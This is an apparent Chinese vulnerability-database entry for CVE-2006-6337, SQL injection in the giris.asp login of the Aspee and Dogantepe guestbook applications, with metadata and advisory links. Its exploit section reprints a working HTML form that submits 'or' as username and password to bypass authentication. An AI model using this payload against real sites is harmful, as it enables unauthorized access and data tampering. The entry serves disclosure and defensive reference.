Aspee Ziyareti Defteri 'giris.asp'多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111695 漏洞类型 SQL注入
发布时间 2006-12-01 更新时间 2006-12-27
CVE编号 CVE-2006-6337 CNNVD-ID CNNVD-200612-109
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/29216
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-109
|漏洞详情
Aspee和DogantepeZiyaretciDefteri中的giris.asp中存在多个SQL注入漏洞,远程攻击者通过(1)kullanici或(2)parola参数执行任意SQL命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/21398/info

Aspee Ziyaretçi Defteri is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. 

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

<title>Remote Admin Attack - LiderHack.Org // Hacking & Security PortaL</title> <center>ShaFuck31 - LiderHack.Org</center> <FORM NAME=giris ACTION="http://victim.com/[path to script]/giris.asp" METHOD=post> <table align=center> <td>Kullanici Adi:</td><td><INPUT NAME=kullanici class="input" value="'or'" SIZE=15></td> </tr><tr> <td>Sifre:</td><td><INPUT NAME=parola TYPE=text class="input" value="'or'" SIZE=15></td> </tr><tr> <td align=center colspan=2><BUTTON class="input" TYPE=submit>Giris</BUTTON></td> </tr></table></form>
|参考资料

来源:XF
名称:antepe-giris-sql-injection(30919)
链接:http://xforce.iss.net/xforce/xfdb/30919
来源:BID
名称:21627
链接:http://www.securityfocus.com/bid/21627
来源:BID
名称:21398
链接:http://www.securityfocus.com/bid/21398
来源:BUGTRAQ
名称:20061216DoğantepeZiyaretçiDefteri(tr)SqlInjectionVuln.
链接:http://www.securityfocus.com/archive/1/archive/1/454589/100/0/threaded
来源:BUGTRAQ
名称:20061201AspeeZiyaretçiDefteri(tr)SqlinjectionVuln.
链接:http://www.securityfocus.com/archive/1/archive/1/453234/100/0/threaded
来源:VUPEN
名称:ADV-2006-4825
链接:http://www.frsirt.com/english/advisories/2006/4825
来源:SECUNIA
名称:23291
链接:http://secunia.com/advisories/23291